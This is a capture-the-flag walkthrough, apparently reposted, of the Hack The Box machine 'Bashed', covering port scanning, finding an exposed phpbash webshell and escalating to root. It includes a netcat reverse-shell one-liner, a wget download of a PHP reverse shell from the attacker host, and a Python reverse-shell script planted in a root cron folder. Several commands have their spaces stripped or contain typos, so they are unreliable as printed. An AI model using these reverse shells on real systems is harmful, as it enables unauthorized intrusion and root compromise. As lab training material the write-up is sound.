Bashed -- hack the box

Bashed -- hack the box_第1张图片

Introduction

Target: 10.10.10.68 (OS: Linux)

Kali linux: 10.10.16.44

Information Enumeration

Firstly, detect the open ports:

# Nmap 7.70 scan initiated Wed Apr  3 20:48:43 2019 as: nmap -sT -p- --min-rate 10000 -oA openports 10.10.10.68	
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).	
Nmap scan report for 10.10.10.68	
Host is up (0.31s latency).	
Not shown: 39680 closed ports, 25854 filtered ports	
PORT   STATE SERVICE	
80/tcp open  http

Only port 80 is open, it may be an easy box. And the truth is that it is really an easy box.

Then, detect the service of the port 80, it may be a kind of http service.

# Nmap 7.70 scan initiated Wed Apr  3 20:55:27 2019 as: nmap -sC -sV -p 80 -oA services 10.10.10.68	
Nmap scan report for 10.10.10.68	
Host is up (0.35s latency).	
PORT   STATE SERVICE VERSION	
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))	
|_http-server-header: Apache/2.4.18 (Ubuntu)	
|_http-title: Arrexel's Development Site

Nothing special. Then access the http service and find more.

Exploit

Http

Access to http://10.10.10.68, and it seems to be a simple blog which talks about phpbash.

Bashed -- hack the box_第2张图片

phpbash seems to be a webshell tool. And there is a github repository phpbash introduces the tool. The introduction of the repo is to drop the file to target and access it by http://ip/uploads/phpbash.php. Try to access http://10.10.10.68/uploads/phpbash.php. But the file seems not to be here.

Utilize the dirbuster to enumerate the directories.

Bashed -- hack the box_第3张图片

Wow. Find it and open the file phpbash.php. Here is the webshell. I have tried to reverse shell by rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc10.10.16.441234>/tmp/f. But the shell cannot be returned. Whatever, I can obtain the user.txt.

Bashed -- hack the box_第4张图片

It is convenient to get the reverse shell. So I try to upload a php shell to the target machine. The detailed php script can be found here. And I server the php script by python-mSimpleHTTPServer80. Then download the php script from the target machine. To ensure the script can be written to the target machine. Select a path can be written, for example: /tmp.

Bashed -- hack the box_第5张图片

wget http://10.10.16.44/php-reverse-shell.php

Then in the kali, set the nc listen to port 1234:

nc-lvnp1234

Execute the php script in the target machine php php-reverse-shell.php. OK. We obtain the reverse shell.

Bashed -- hack the box_第6张图片

Privilege escalation

Obtain the user permission is quite easy, and it is not difficult to obtain the root permission. Utilize sudo-l to see the permissions of the user. Something interesting found. We can switch to scriptmanager user without password.

Bashed -- hack the box_第7张图片

su -u scrriptmanager bash -i

Try to enumerate the files. And I find an interesting folder inside /scripts. There are two files test.py and test.txt. Try to display the content of test.py.

Bashed -- hack the box_第8张图片

The python script is quite straightforward. It just writes testing123! to the file test.txt. And if we see the attributes of test.txt, the modified time of the file changes each minute. And the file is owned by root. It seems that root will execute the python scripts in /scriptsfolder each minute. So utilize a python script to reverse the root shell(according to the information above, the python version of the target machine is 2.7):

import socket,subprocess,os;	
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);	
s.connect(("10.10.16.44",4444));	
os.dup2(s.fileno(),0); 	
os.dup2(s.fileno(),1);	
os.dup2(s.fileno(),2);	
p=subprocess.call(["/bin/sh","-i"]);

Set the kali listen to port 4444. Download the python script in the target machine and execute. Now, root shell is obtained.

Bashed -- hack the box_第9张图片

Bashed -- hack the box_第10张图片

你可能感兴趣的:(Bashed -- hack the box)